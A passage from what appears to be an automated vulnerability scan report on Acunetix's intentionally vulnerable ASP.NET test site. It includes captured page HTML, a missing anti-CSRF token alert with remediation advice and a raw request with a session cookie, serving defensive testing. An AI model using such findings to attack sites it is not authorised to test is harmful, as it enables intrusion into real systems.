PlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/sNcuYAa/cRqMvUgVyEWyccHwUIA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        21. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Content-Length: 3745
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3745 bytes)
